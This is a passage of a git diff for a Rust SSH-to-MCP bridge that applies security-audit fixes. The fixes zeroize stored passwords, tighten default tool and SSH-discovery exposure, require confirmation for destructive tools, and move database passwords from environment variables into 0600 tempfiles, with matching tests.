+/// A single OAuth signing key entry for static-key validation. +/// +/// Used by [`HttpOAuthConfig::static_keys`] to populate the validator's +/// in-memory key map at boot. Keys are addressed by their JWT `kid` +/// header. #[derive(Debug, Clone, Deserialize, Serialize)] +#[serde(rename_all = "camelCase", deny_unknown_fields)] +pub struct HttpOAuthStaticKey { + /// JWT `kid` header value this key matches. + pub kid: String, + /// PEM-encoded RSA public key (PKCS#1 or `SubjectPublicKeyInfo`). + pub public_key_pem: String, +} + +#[derive(Debug, Clone, Deserialize, Serialize)] +#[serde(deny_unknown_fields)] pub struct HostConfig { pub hostname: String, @@ -206,9 +246,14 @@ pub struct HostConfig { #[serde(default)] pub socks_proxy: Option, - /// Optional sudo password for this host (used with sudo commands) + /// Optional sudo password for this host (used with sudo commands). + /// + /// Wrapped in [`Zeroizing`] so the byte buffer is overwritten when + /// the value is dropped (FIND-028). Hot-reload via `config/watcher.rs` + /// drops the old `HostConfig`, which now wipes the prior password + /// instead of leaving it resident on the heap for the process lifetime. #[serde(default)] - pub sudo_password: Option, + pub sudo_password: Option>, /// Tags for grouping hosts (e.g., "production", "staging", "database") #[serde(default)] @@ -270,6 +315,7 @@ pub struct HostConfig { /// Per-host retry configuration override #[derive(Debug, Clone, Deserialize, Serialize)] +#[serde(deny_unknown_fields)] pub struct HostRetryConfig { /// Maximum retry attempts (overrides global `limits.retry_attempts`) #[serde(default)] @@ -392,6 +438,7 @@ const fn default_port() -> u16 { /// SOCKS proxy configuration for tunneling SSH connections #[derive(Debug, Clone, Deserialize, Serialize)] +#[serde(deny_unknown_fields)] pub struct SocksProxyConfig { /// Proxy hostname or IP pub hostname: String, @@ -408,9 +455,14 @@ pub struct SocksProxyConfig { #[serde(default)] pub username: Option, - /// Optional password for SOCKS5 authentication + /// Optional password for SOCKS5 authentication. + /// + /// Wrapped in `Zeroizing` so the byte buffer is overwritten + /// when the value is dropped (FIND-014). `SocksProxyConfig` lives for + /// the entire process; without `Zeroizing` the password sits in heap + /// from start to exit. #[serde(default)] - pub password: Option, + pub password: Option>, } /// SOCKS protocol version @@ -473,6 +525,7 @@ pub enum AuthConfig { } #[derive(Debug, Clone, Deserialize, Serialize)] +#[serde(deny_unknown_fields)] pub struct SecurityConfig { #[serde(default = "default_security_mode")] pub mode: SecurityMode, @@ -496,7 +549,11 @@ pub struct SecurityConfig { /// `elicitation` capability, the server asks the user to confirm; on /// decline/cancel the tool call returns an error without executing. /// When the client does not support elicitation, the call is rejected. - #[serde(default)] + /// + /// Defaults to `true` (security-first); set to `false` to opt out + /// (NOT RECOMMENDED in production — a compromised MCP client can + /// mass-execute destructive tools without surfacing to a human). + #[serde(default = "default_require_elicitation_on_destructive")] pub require_elicitation_on_destructive: bool, } @@ -508,11 +565,20 @@ impl Default for SecurityConfig { blacklist: default_blacklist(), sanitize_patterns: Vec::new(), sanitize: SanitizeConfig::default(), - require_elicitation_on_destructive: false, + require_elicitation_on_destructive: default_require_elicitation_on_destructive(), } } } +/// Default for `SecurityConfig::require_elicitation_on_destructive`. +/// +/// FIND-022: defaults to `true` (security-first). Operators who want the +/// legacy permissive behaviour must opt out explicitly via +/// `security.require_elicitation_on_destructive: false`. +fn default_require_elicitation_on_destructive() -> bool { + true +} + /// Advanced sanitizer configuration /// /// Allows fine-grained control over output sanitization: @@ -520,6 +586,7 @@ impl Default for SecurityConfig { /// - Disable specific builtin pattern categories /// - Add custom patterns with custom replacement text #[derive(Debug, Clone, Deserialize, Serialize)] +#[serde(deny_unknown_fields)] pub struct SanitizeConfig { /// Enable/disable sanitization entirely (default: true) #[serde(default = "default_sanitize_enabled")] @@ -605,6 +672,7 @@ const fn default_sanitize_enabled() -> bool { /// Custom sanitization pattern with configurable replacement #[derive(Debug, Clone, Deserialize, Serialize)] +#[serde(deny_unknown_fields)] pub struct CustomSanitizePattern { /// Regex pattern to match sensitive data pub pattern: String, @@ -688,6 +756,7 @@ pub enum SecurityMode { } #[derive(Debug, Clone, Deserialize, Serialize)] +#[serde(deny_unknown_fields)] pub struct LimitsConfig { #[serde(default = "default_command_timeout")] pub command_timeout_seconds: u64, @@ -845,6 +914,7 @@ pub enum MatchMode { /// Per-client override for output limits, matched by MCP client name. #[derive(Debug, Clone, Deserialize, Serialize)] +#[serde(deny_unknown_fields)] pub struct ClientOverride { /// Pattern to match against the MCP client name (case-insensitive) pub name_contains: String, @@ -975,6 +1045,7 @@ const fn default_sftp_write_threshold() -> usize { } #[derive(Debug, Clone, Deserialize, Serialize)] +#[serde(deny_unknown_fields)] pub struct AuditConfig { #[serde(default = "default_audit_enabled")] pub enabled: bool, @@ -1020,6 +1091,7 @@ const fn default_audit_retain() -> u32 { } #[derive(Debug, Clone, Deserialize, Serialize)] +#[serde(deny_unknown_fields)] pub struct SessionConfig { /// Maximum number of concurrent sessions #[serde(default = "default_max_sessions")] @@ -1060,10 +1132,14 @@ const fn default_session_max_age() -> u64 { /// /// When enabled, the bridge will parse `~/.ssh/config` and automatically /// discover hosts. YAML-defined hosts take precedence over discovered ones. -/// Enabled by default to reduce time-to-first-command. +/// FIND-023: disabled by default. Enabling exposes the operator's full +/// personal SSH host inventory (often >> the YAML-declared production set) +/// to MCP clients via the bridge's host-listing surfaces. Operators who +/// want the time-to-first-command convenience must opt in explicitly. #[derive(Debug, Clone, Deserialize, Serialize)] +#[serde(deny_unknown_fields)] pub struct SshConfigDiscovery { - /// Enable SSH config auto-discovery (default: true) + /// Enable SSH config auto-discovery (default: false — FIND-023). #[serde(default = "default_ssh_config_enabled")] pub enabled: bool, @@ -1087,7 +1163,8 @@ impl Default for SshConfigDiscovery { } const fn default_ssh_config_enabled() -> bool { - true + // FIND-023: discovery is opt-in. See SshConfigDiscovery doc comment. + false } fn default_ssh_config_path() -> String { @@ -1234,19 +1311,58 @@ fn default_ssh_config_path() -> String { /// - `recording`: `ssh_recording_start`, `ssh_recording_stop`, `ssh_recording_list`, /// `ssh_recording_replay`, `ssh_recording_verify` #[derive(Debug, Clone, Default, Deserialize, Serialize)] +#[serde(deny_unknown_fields)] pub struct ToolGroupsConfig { /// Map of group name to enabled status. - /// Groups not listed are enabled by default. + /// + /// FIND-024 (audit 2026-05-09): unlisted groups are now treated as + /// **disabled** unless they appear in [`MINIMAL_DEFAULT_GROUPS`]. The + /// previous semantics (unlisted = enabled) exposed all 75 groups / + /// 357 handlers out of the box, violating least-privilege for + /// operators who only need a small subset (e.g. `docker` + `service`). + /// + /// The default value is an empty map; resolution falls through to + /// `MINIMAL_DEFAULT_GROUPS` membership in [`Self::is_group_enabled`]. + /// A YAML config that explicitly lists `core: false` still wins over + /// the default profile. + /// + /// To enable a non-default group, list it explicitly with `true`. To + /// disable a group from the default profile, list it with `false`. #[serde(default)] pub groups: HashMap, } +/// Default-enabled tool groups (FIND-024). +/// +/// Covers the eight groups that nearly every operator workflow uses: +/// raw exec, file ops, directory listing, process management, system +/// monitoring, network diagnostics, systemd service management, and +/// persistent tmux sessions. Everything else (containers, K8s, AD/LDAP, +/// cloud, `ESXi`, Hyper-V, Windows-specific, etc.) requires explicit +/// opt-in via the YAML map. +pub const MINIMAL_DEFAULT_GROUPS: &[&str] = &[ + "core", + "file_ops", + "directory", + "process", + "monitoring", + "network", + "systemd", + "sessions", +]; + impl ToolGroupsConfig { /// Check if a given tool group is enabled. - /// Groups not explicitly listed default to enabled. + /// + /// Resolution order: + /// 1. If the group appears in `self.groups` with an explicit value, use it. + /// 2. Otherwise, group is enabled iff it is in [`MINIMAL_DEFAULT_GROUPS`]. #[must_use] pub fn is_group_enabled(&self, group: &str) -> bool { - self.groups.get(group).copied().unwrap_or(true) + match self.groups.get(group).copied() { + Some(explicit) => explicit, + None => MINIMAL_DEFAULT_GROUPS.contains(&group), + } } } @@ -1539,7 +1655,7 @@ mod tests { assert_eq!(config.port, 9050); assert_eq!(config.version, SocksVersion::Socks4); assert_eq!(config.username, Some("user".to_string())); - assert_eq!(config.password, Some("pass".to_string())); + assert_eq!(config.password.as_deref().map(String::as_str), Some("pass")); } #[test] @@ -1670,11 +1786,26 @@ mod tests { } #[test] - fn test_tool_groups_config_unlisted_group_is_enabled() { + fn test_tool_groups_config_default_profile_membership() { + // FIND-024: default profile is the 8 groups in MINIMAL_DEFAULT_GROUPS. + // Everything else is opt-in. let config = ToolGroupsConfig::default(); + + // In default profile. assert!(config.is_group_enabled("core")); assert!(config.is_group_enabled("sessions")); - assert!(config.is_group_enabled("anything")); + assert!(config.is_group_enabled("file_ops")); + assert!(config.is_group_enabled("directory")); + assert!(config.is_group_enabled("process")); + assert!(config.is_group_enabled("monitoring")); + assert!(config.is_group_enabled("network")); + assert!(config.is_group_enabled("systemd")); + + // NOT in default profile — must be opt-in now. + assert!(!config.is_group_enabled("docker")); + assert!(!config.is_group_enabled("kubernetes")); + assert!(!config.is_group_enabled("active_directory")); + assert!(!config.is_group_enabled("anything")); } #[test] @@ -1708,15 +1839,19 @@ mod tests { assert!(!config.is_group_enabled("sessions")); assert!(!config.is_group_enabled("monitoring")); assert!(config.is_group_enabled("core")); - assert!(config.is_group_enabled("file_transfer")); // Unlisted = enabled + // FIND-024: `file_transfer` is NOT in MINIMAL_DEFAULT_GROUPS, so + // unlisted means disabled now (was enabled prior to FIND-024). + assert!(!config.is_group_enabled("file_transfer")); } #[test] fn test_tool_groups_config_empty_deserialization() { + // FIND-024: empty config -> default profile via MINIMAL_DEFAULT_GROUPS. let yaml = "{}"; let config: ToolGroupsConfig = serde_saphyr::from_str(yaml).unwrap(); assert!(config.groups.is_empty()); - assert!(config.is_group_enabled("core")); + assert!(config.is_group_enabled("core")); // in default profile + assert!(!config.is_group_enabled("docker")); // not in default profile } #[test] diff --git a/src/domain/mod.rs b/src/domain/mod.rs index 72c3a8e7..90fb766c 100644 --- a/src/domain/mod.rs +++ b/src/domain/mod.rs @@ -14,6 +14,7 @@ pub mod output_truncator; pub mod runbook; pub mod task_store; pub mod use_cases; +pub mod yaml; #[cfg(feature = "jq")] pub mod yq_filter; diff --git a/src/domain/runbook.rs b/src/domain/runbook.rs index 9afa8676..f6800860 100644 --- a/src/domain/runbook.rs +++ b/src/domain/runbook.rs @@ -11,6 +11,7 @@ use tracing::{info, warn}; /// A runbook definition loaded from YAML #[derive(Debug, Clone, Serialize, Deserialize)] +#[serde(deny_unknown_fields)] pub struct Runbook { pub name: String, pub description: String, @@ -27,6 +28,7 @@ fn default_version() -> String { /// Runbook parameter definition #[derive(Debug, Clone, Serialize, Deserialize)] +#[serde(deny_unknown_fields)] pub struct RunbookParam { #[serde(rename = "type", default = "default_param_type")] pub param_type: String, @@ -42,6 +44,7 @@ fn default_param_type() -> String { /// A single step in a runbook #[derive(Debug, Clone, Serialize, Deserialize)] +#[serde(deny_unknown_fields)] pub struct RunbookStep { pub name: String, #[serde(default)] @@ -157,7 +160,7 @@ pub fn load_runbook(path: &Path) -> Result { let content = std::fs::read_to_string(path) .map_err(|e| format!("Failed to read {}: {e}", path.display()))?; - let runbook: Runbook = serde_saphyr::from_str(&content) + let runbook: Runbook = super::yaml::parse_yaml(&content) .map_err(|e| format!("Failed to parse {}: {e}", path.display()))?; validate_runbook(&runbook)?; @@ -185,7 +188,7 @@ pub fn builtin_runbooks() -> Vec { definitions .iter() .filter_map(|yaml| { - serde_saphyr::from_str(yaml) + super::yaml::parse_yaml(yaml) .map_err(|e| warn!(error = %e, "Failed to parse built-in runbook")) .ok() }) diff --git a/src/domain/use_cases/database.rs b/src/domain/use_cases/database.rs index 0f9badc3..576e1ca4 100644 --- a/src/domain/use_cases/database.rs +++ b/src/domain/use_cases/database.rs @@ -83,15 +83,71 @@ fn shell_escape(s: &str) -> String { super::shell::escape(s, ShellType::Posix) } -/// Helper to write the password environment variable prefix. +/// FIND-031: write a tempfile-creation prelude that stores the DB password +/// in a 0600 file, registers a cleanup trap, and (for `MySQL`) writes the +/// `[client]` section. The remote DB CLI then reads the password from the +/// file instead of from environ/argv — `/proc/PID/environ` and `ps eww` +/// stay clean. /// -/// **Security note:** Environment variables set this way (`MYSQL_PWD=... mysql ...`) -/// may be visible in `/proc/PID/environ` on Linux. This is more secure than passing -/// passwords as command-line arguments (visible in `ps`), but for maximum security -/// consider using connection files (`~/.my.cnf`, `~/.pgpass`) on the remote host. -fn write_password_env(cmd: &mut String, env_var: &str, password: &str) { +/// Layout: +/// - `mktemp` creates a unique path (atomic, race-free). +/// - `trap '...' EXIT` ensures the file is shredded/removed even on signal. +/// - `chmod 600` restricts access to the bridge user before writing the +/// password (prevents a TOCTOU window where another process reads the +/// default-mode file). +/// - `printf '...' '' > $TMPF` writes the file content. The password +/// is a `printf` format-arg, not a CLI flag value visible to other +/// processes' `ps`. +/// +/// `shred -u` overwrites the inode before unlink (defense against forensic +/// recovery of swapped-out tempfile content). On BusyBox/Alpine where +/// `shred` is missing, the `|| rm -f` fallback still removes the file. +/// +/// `password` is single-quote-escaped POSIX-style. `printf '%s\n' ''` +/// treats `%` and `\\` literally inside the single-quoted argument, so no +/// further escaping is required for those chars. +fn write_mysql_password_tempfile(cmd: &mut String, password: &str) { let escaped_pw = password.replace('\'', "'\\''"); - let _ = write!(cmd, "{env_var}='{escaped_pw}' "); + let _ = write!( + cmd, + "TMPF=$(mktemp) && \ + trap 'shred -u \"$TMPF\" 2>/dev/null || rm -f \"$TMPF\"' EXIT && \ + chmod 600 \"$TMPF\" && \ + printf '[client]\\npassword=%s\\n' '{escaped_pw}' > $TMPF && " + ); +} + +/// FIND-031: `PostgreSQL` counterpart of [`write_mysql_password_tempfile`]. +/// Writes a `~/.pgpass`-style line in the format +/// `host:port:database:user:password` (per `psql(1)` man page) and then +/// exports `PGPASSFILE=$TMPF` so `psql` / `pg_dump` pick it up. +/// +/// The pgpass format permits `:` and `\\` in the password, but they must +/// be escaped with a backslash. We perform that escaping here in addition +/// to the single-quote escape for the `printf` format-arg. +fn write_pg_password_tempfile( + cmd: &mut String, + db_host: &str, + db_port: u16, + database: &str, + db_user: &str, + password: &str, +) { + // pgpass-format escaping: \ and : must be backslash-escaped. + let pgpass_pw = password.replace('\\', "\\\\").replace(':', "\\:"); + // POSIX single-quote escaping for the printf format-arg. + let printf_pw = pgpass_pw.replace('\'', "'\\''"); + let printf_host = db_host.replace('\\', "\\\\").replace(':', "\\:"); + let printf_db = database.replace('\\', "\\\\").replace(':', "\\:"); + let printf_user = db_user.replace('\\', "\\\\").replace(':', "\\:"); + let _ = write!( + cmd, + "TMPF=$(mktemp) && \ + trap 'shred -u \"$TMPF\" 2>/dev/null || rm -f \"$TMPF\"' EXIT && \ + chmod 600 \"$TMPF\" && \ + printf '%s:%s:%s:%s:%s\\n' '{printf_host}' '{db_port}' '{printf_db}' '{printf_user}' '{printf_pw}' > $TMPF && \ + PGPASSFILE=$TMPF " + ); } /// Helper to write the compression suffix or plain redirect. @@ -119,8 +175,23 @@ pub struct DatabaseCommandBuilder; impl DatabaseCommandBuilder { /// Build a SQL query command. /// - /// For `MySQL`: `MYSQL_PWD='password' mysql -h host -P port -u user database -e "query"` - /// For `PostgreSQL`: `PGPASSWORD='password' psql -h host -p port -U user -d database -c "query"` + /// **FIND-031 (Sprint 2 Task 21):** when a password is supplied, it is + /// written to a 0600 tempfile (cleaned up by `trap ... EXIT`) and the + /// DB CLI reads it from there: + /// - `MySQL`: `--defaults-extra-file=$TMPF` (must be the *first* mysql arg). + /// - `PostgreSQL`: `PGPASSFILE=$TMPF` env var with a `~/.pgpass`-format file. + /// + /// The previous shape used `MYSQL_PWD=...` / `PGPASSWORD=...` env vars, + /// which were visible in `/proc/PID/environ` on the remote host for the + /// lifetime of the DB process. The tempfile pattern keeps the password + /// out of both argv and environ. + /// + /// Resulting shape (`MySQL` with password): + /// ```text + /// TMPF=$(mktemp) && trap '...' EXIT && chmod 600 "$TMPF" && \ + /// printf '[client]\npassword=%s\n' '' > $TMPF && \ + /// mysql --defaults-extra-file=$TMPF -h host -P 3306 -u user db -e 'query' + /// ``` #[must_use] #[expect(clippy::too_many_arguments)] pub fn build_query_command( @@ -142,21 +213,28 @@ impl DatabaseCommandBuilder { match db_type { DatabaseType::MySQL => { if let Some(password) = db_password { - write_password_env(&mut cmd, "MYSQL_PWD", password); + write_mysql_password_tempfile(&mut cmd, password); + // --defaults-extra-file must be the FIRST mysql argument. + let _ = write!( + cmd, + "mysql --defaults-extra-file=$TMPF -h {escaped_host} -P {db_port} -u {escaped_user} {escaped_db} -e '{escaped_query}'" + ); + } else { + let _ = write!( + cmd, + "mysql -h {escaped_host} -P {db_port} -u {escaped_user} {escaped_db} -e '{escaped_query}'" + ); } - let _ = write!( - cmd, - "mysql -h {escaped_host} -P {db_port} -u {escaped_user} {escaped_db} -e '{escaped_query}'" - ); - if let Some("csv") = format { cmd.push_str(" -B"); } } DatabaseType::PostgreSQL => { if let Some(password) = db_password { - write_password_env(&mut cmd, "PGPASSWORD", password); + write_pg_password_tempfile( + &mut cmd, db_host, db_port, database, db_user, password, + ); } let _ = write!( @@ -175,8 +253,11 @@ impl DatabaseCommandBuilder { /// Build a database dump command. /// - /// For `MySQL`: `MYSQL_PWD='password' mysqldump -h host -P port -u user database` - /// For `PostgreSQL`: `PGPASSWORD='password' pg_dump -h host -p port -U user database` + /// **FIND-031:** uses the same tempfile pattern as + /// [`Self::build_query_command`] to keep passwords out of argv/environ. + /// + /// - `MySQL`: `mysqldump --defaults-extra-file=$TMPF -h host ...`. + /// - `PostgreSQL`: `PGPASSFILE=$TMPF pg_dump -h host ...`. #[must_use] #[expect(clippy::too_many_arguments)] pub fn build_dump_command( @@ -198,14 +279,18 @@ impl DatabaseCommandBuilder { match db_type { DatabaseType::MySQL => { if let Some(password) = db_password { - write_password_env(&mut cmd, "MYSQL_PWD", password); + write_mysql_password_tempfile(&mut cmd, password); + let _ = write!( + cmd, + "mysqldump --defaults-extra-file=$TMPF -h {escaped_host} -P {db_port} -u {escaped_user} {escaped_db}" + ); + } else { + let _ = write!( + cmd, + "mysqldump -h {escaped_host} -P {db_port} -u {escaped_user} {escaped_db}" + ); } - let _ = write!( - cmd, - "mysqldump -h {escaped_host} -P {db_port} -u {escaped_user} {escaped_db}" - ); - if let Some(table_list) = tables { for table in table_list { let _ = write!(cmd, " {}", shell_escape(table)); @@ -214,7 +299,9 @@ impl DatabaseCommandBuilder { } DatabaseType::PostgreSQL => { if let Some(password) = db_password { - write_password_env(&mut cmd, "PGPASSWORD", password); + write_pg_password_tempfile( + &mut cmd, db_host, db_port, database, db_user, password, + ); } let _ = write!( @@ -237,8 +324,11 @@ impl DatabaseCommandBuilder { /// Build a database restore command. /// - /// For `MySQL`: `MYSQL_PWD='password' mysql -h host -P port -u user database < input_file` - /// For `PostgreSQL`: `PGPASSWORD='password' psql -h host -p port -U user -d database < input_file` + /// **FIND-031:** uses the same tempfile pattern as + /// [`Self::build_query_command`] to keep passwords out of argv/environ. + /// + /// - `MySQL`: `mysql --defaults-extra-file=$TMPF ... < input_file`. + /// - `PostgreSQL`: `PGPASSFILE=$TMPF psql ... < input_file`. #[must_use] pub fn build_restore_command( db_type: &DatabaseType, @@ -258,17 +348,23 @@ impl DatabaseCommandBuilder { match db_type { DatabaseType::MySQL => { if let Some(password) = db_password { - write_password_env(&mut cmd, "MYSQL_PWD", password); + write_mysql_password_tempfile(&mut cmd, password); + let _ = write!( + cmd, + "mysql --defaults-extra-file=$TMPF -h {escaped_host} -P {db_port} -u {escaped_user} {escaped_db} < {escaped_file}" + ); + } else { + let _ = write!( + cmd, + "mysql -h {escaped_host} -P {db_port} -u {escaped_user} {escaped_db} < {escaped_file}" + ); } - - let _ = write!( - cmd, - "mysql -h {escaped_host} -P {db_port} -u {escaped_user} {escaped_db} < {escaped_file}" - ); } DatabaseType::PostgreSQL => { if let Some(password) = db_password { - write_password_env(&mut cmd, "PGPASSWORD", password); + write_pg_password_tempfile( + &mut cmd, db_host, db_port, database, db_user, password, + ); } let _ = write!( @@ -399,8 +495,12 @@ mod tests { "SELECT * FROM users", Some("csv"), ); - assert!(cmd.starts_with("MYSQL_PWD='secret' ")); - assert!(cmd.contains("mysql -h 'dbhost' -P 3306 -u 'admin' 'mydb'")); + // FIND-031: password lives in a 0600 tempfile, mysql reads it via + // --defaults-extra-file. No env var prefix anymore. + assert!(cmd.starts_with("TMPF=$(mktemp)")); + assert!(cmd.contains("printf '[client]\\npassword=%s\\n' 'secret'")); + assert!(cmd.contains("mysql --defaults-extra-file=$TMPF")); + assert!(cmd.contains("-h 'dbhost' -P 3306 -u 'admin' 'mydb'")); assert!(cmd.contains("-e 'SELECT * FROM users'")); assert!(cmd.contains("-B")); } @@ -467,7 +567,14 @@ mod tests { "SELECT * FROM orders", Some("csv"), ); - assert!(cmd.starts_with("PGPASSWORD='pgpass' ")); + // FIND-031: password lives in a 0600 ~/.pgpass-format tempfile; + // PGPASSFILE env var points psql at it. No PGPASSWORD anymore. + assert!(cmd.starts_with("TMPF=$(mktemp)")); + assert!(cmd.contains("PGPASSFILE=$TMPF")); + // pgpass format: host:port:database:user:password + assert!( + cmd.contains("printf '%s:%s:%s:%s:%s\\n' 'pghost' '5432' 'pgdb' 'pguser' 'pgpass'") + ); assert!(cmd.contains("psql -h 'pghost' -p 5432 -U 'pguser' -d 'pgdb'")); assert!(cmd.contains("-c 'SELECT * FROM orders'")); assert!(cmd.contains("--csv")); @@ -533,7 +640,10 @@ mod tests { "SELECT 1", None, ); - assert!(cmd.contains("MYSQL_PWD='pass'\\''word'")); + // FIND-031: password is in a printf format-arg, not an env var. + // Single-quote escape (POSIX `'\''` sequence) still applies. + assert!(cmd.contains("'pass'\\''word'")); + assert!(!cmd.contains("MYSQL_PWD")); } // ============== build_dump_command Tests ============== @@ -551,8 +661,10 @@ mod tests { None, "/tmp/dump.sql", ); - assert!(cmd.contains("MYSQL_PWD='pass'")); - assert!(cmd.contains("mysqldump -h 'localhost' -P 3306 -u 'root' 'mydb'")); + // FIND-031: --defaults-extra-file pattern, no MYSQL_PWD env. + assert!(cmd.contains("printf '[client]\\npassword=%s\\n' 'pass'")); + assert!(cmd.contains("mysqldump --defaults-extra-file=$TMPF")); + assert!(cmd.contains("-h 'localhost' -P 3306 -u 'root' 'mydb'")); assert!(cmd.contains("> '/tmp/dump.sql'")); assert!(!cmd.contains("| gzip")); } @@ -635,7 +747,9 @@ mod tests { None, "/tmp/dump.sql", ); - assert!(cmd.contains("PGPASSWORD='pgpass'")); + // FIND-031: PGPASSFILE pgpass-file pattern, no PGPASSWORD env. + assert!(cmd.contains("PGPASSFILE=$TMPF")); + assert!(cmd.contains("printf '%s:%s:%s:%s:%s\\n'")); assert!(cmd.contains("pg_dump -h 'localhost' -p 5432 -U 'postgres' 'mydb'")); assert!(cmd.contains("> '/tmp/dump.sql'")); } @@ -703,8 +817,11 @@ mod tests { "mydb", "/tmp/dump.sql", ); - assert!(cmd.contains("MYSQL_PWD='pass'")); - assert!(cmd.contains("mysql -h 'localhost' -P 3306 -u 'root' 'mydb' < '/tmp/dump.sql'")); + // FIND-031: --defaults-extra-file pattern, no MYSQL_PWD env. + assert!(cmd.contains("printf '[client]\\npassword=%s\\n' 'pass'")); + assert!(cmd.contains( + "mysql --defaults-extra-file=$TMPF -h 'localhost' -P 3306 -u 'root' 'mydb' < '/tmp/dump.sql'" + )); } #[test] @@ -718,7 +835,9 @@ mod tests { "mydb", "/tmp/dump.sql", ); - assert!(cmd.contains("PGPASSWORD='pgpass'")); + // FIND-031: PGPASSFILE pgpass-file pattern, no PGPASSWORD env. + assert!(cmd.contains("PGPASSFILE=$TMPF")); + assert!(cmd.contains("printf '%s:%s:%s:%s:%s\\n'")); assert!( cmd.contains("psql -h 'localhost' -p 5432 -U 'postgres' -d 'mydb' < '/tmp/dump.sql'") ); @@ -917,4 +1036,186 @@ mod tests { fn test_validate_query_explain_is_ok() { assert!(DatabaseCommandBuilder::validate_query("EXPLAIN SELECT * FROM users").is_ok()); } + + // ============== FIND-031: argv/environ leak prevention ============== + + /// FIND-031: `MySQL` password must NOT appear as `MYSQL_PWD=...` (visible + /// in `/proc/PID/environ`) and must NOT appear in argv. The defaults- + /// extra-file pattern stores the password in a 0600 tempfile, cleaned + /// up by `trap ... EXIT`. + /// + /// Test strategy: split on `> $TMPF`, take the portion AFTER (which is + /// the actual `mysql ...` invocation). Password may appear in the + /// printf format-arg before the redirect (tempfile write, not argv) + /// but must not appear after — that's the visible-to-`ps` portion. + #[test] + fn db_query_mysql_excludes_password_from_argv_and_environ() { + let cmd = DatabaseCommandBuilder::build_query_command( + &DatabaseType::MySQL, + "host", + 3306, + "user", + Some("topsecret"), + "db", + "select 1", + None, + ); + + let argv = post_redirect(&cmd); + assert!( + !argv.contains("topsecret"), + "FIND-031: password leaked into argv after tempfile write: {cmd}" + ); + assert!( + !cmd.contains("MYSQL_PWD="), + "FIND-031: MYSQL_PWD env var must be replaced by --defaults-extra-file: {cmd}" + ); + assert!( + cmd.contains("--defaults-extra-file"), + "FIND-031: must use --defaults-extra-file: {cmd}" + ); + } + + /// FIND-031: `PostgreSQL` password must NOT appear as `PGPASSWORD=...`. + /// Use `PGPASSFILE=$TMPF` with a 0600 pgpass file instead. + #[test] + fn db_query_pg_excludes_password_from_argv_and_environ() { + let cmd = DatabaseCommandBuilder::build_query_command( + &DatabaseType::PostgreSQL, + "host", + 5432, + "user", + Some("topsecret"), + "db", + "select 1", + None, + ); + + let argv = post_redirect(&cmd); + assert!( + !argv.contains("topsecret"), + "FIND-031: password leaked into argv after tempfile write: {cmd}" + ); + assert!( + !cmd.contains("PGPASSWORD="), + "FIND-031: PGPASSWORD env var must be replaced by PGPASSFILE: {cmd}" + ); + assert!( + cmd.contains("PGPASSFILE="), + "FIND-031: must use PGPASSFILE: {cmd}" + ); + } + + /// FIND-031: same protection on `mysqldump`. + #[test] + fn db_dump_mysql_excludes_password_from_argv_and_environ() { + let cmd = DatabaseCommandBuilder::build_dump_command( + &DatabaseType::MySQL, + "host", + 3306, + "user", + Some("topsecret"), + "db", + None, + None, + "/tmp/out.sql", + ); + + let argv = post_redirect(&cmd); + assert!(!argv.contains("topsecret"), "argv: {argv}"); + assert!(!cmd.contains("MYSQL_PWD=")); + assert!(cmd.contains("--defaults-extra-file")); + } + + /// FIND-031: same protection on `pg_dump`. + #[test] + fn db_dump_pg_excludes_password_from_argv_and_environ() { + let cmd = DatabaseCommandBuilder::build_dump_command( + &DatabaseType::PostgreSQL, + "host", + 5432, + "user", + Some("topsecret"), + "db", + None, + None, + "/tmp/out.sql", + ); + + let argv = post_redirect(&cmd); + assert!(!argv.contains("topsecret"), "argv: {argv}"); + assert!(!cmd.contains("PGPASSWORD=")); + assert!(cmd.contains("PGPASSFILE=")); + } + + /// FIND-031: same protection on `mysql < dump.sql` restore path. + #[test] + fn db_restore_mysql_excludes_password_from_argv_and_environ() { + let cmd = DatabaseCommandBuilder::build_restore_command( + &DatabaseType::MySQL, + "host", + 3306, + "user", + Some("topsecret"), + "db", + "/tmp/in.sql", + ); + + let argv = post_redirect(&cmd); + assert!(!argv.contains("topsecret"), "argv: {argv}"); + assert!(!cmd.contains("MYSQL_PWD=")); + assert!(cmd.contains("--defaults-extra-file")); + } + + /// FIND-031: same protection on `psql < dump.sql` restore path. + #[test] + fn db_restore_pg_excludes_password_from_argv_and_environ() { + let cmd = DatabaseCommandBuilder::build_restore_command( + &DatabaseType::PostgreSQL, + "host", + 5432, + "user", + Some("topsecret"), + "db", + "/tmp/in.sql", + ); + + let argv = post_redirect(&cmd); + assert!(!argv.contains("topsecret"), "argv: {argv}"); + assert!(!cmd.contains("PGPASSWORD=")); + assert!(cmd.contains("PGPASSFILE=")); + } + + /// Helper: returns the portion of the command AFTER the `> $TMPF` redirect. + /// This is the `mysql ... ` / `psql ... ` invocation that is visible to + /// `ps eww` on the remote host. The password must never appear here. + /// If no tempfile redirect exists (no-password path), returns the whole + /// command (the entire thing is argv). + fn post_redirect(cmd: &str) -> &str { + cmd.split_once("> $TMPF && ") + .map_or(cmd, |(_, after)| after) + } + + /// FIND-031: tempfile must be created with mode 0600 and cleaned up by + /// trap-on-EXIT (with shred preferred, rm fallback). + #[test] + fn db_query_tempfile_is_secure_and_cleaned_up() { + let cmd = DatabaseCommandBuilder::build_query_command( + &DatabaseType::MySQL, + "host", + 3306, + "user", + Some("pw"), + "db", + "select 1", + None, + ); + assert!(cmd.contains("mktemp"), "must use mktemp: {cmd}"); + assert!(cmd.contains("chmod 600"), "must chmod 600: {cmd}"); + assert!(cmd.contains("trap"), "must register cleanup trap: {cmd}"); + assert!( + cmd.contains("shred -u") || cmd.contains("rm -f"), + "must clean up tempfile: {cmd}" + ); + } } diff --git a/src/domain/use_cases/file_advanced.rs b/src/domain/use_cases/file_advanced.rs index ffee9890..7a7e4bf7 100644 --- a/src/domain/use_cases/file_advanced.rs +++ b/src/domain/use_cases/file_advanced.rs @@ -3,11 +3,27 @@ //! Builds commands for file diff, patch, and template operations. use crate::config::ShellType; +use crate::error::{BridgeError, Result}; fn shell_escape(s: &str) -> String { super::shell::escape(s, ShellType::Posix) } +fn validate_env_var_name(name: &str) -> Result<()> { + let mut chars = name.chars(); + let first_ok = chars + .next() + .is_some_and(|c| c.is_ascii_alphabetic() || c == '_'); + let rest_ok = chars.all(|c| c.is_ascii_alphanumeric() || c == '_'); + if first_ok && rest_ok && !name.is_empty() { + Ok(()) + } else { + Err(BridgeError::CommandDenied { + reason: format!("Invalid env var name '{name}'. Must match [A-Za-z_][A-Za-z0-9_]*"), + }) + } +} + /// Builds advanced file operation commands. pub struct FileAdvancedCommandBuilder; @@ -30,23 +46,24 @@ impl FileAdvancedCommandBuilder { } /// Build a template rendering command using envsubst. - #[must_use] + /// + /// # Errors + /// + /// 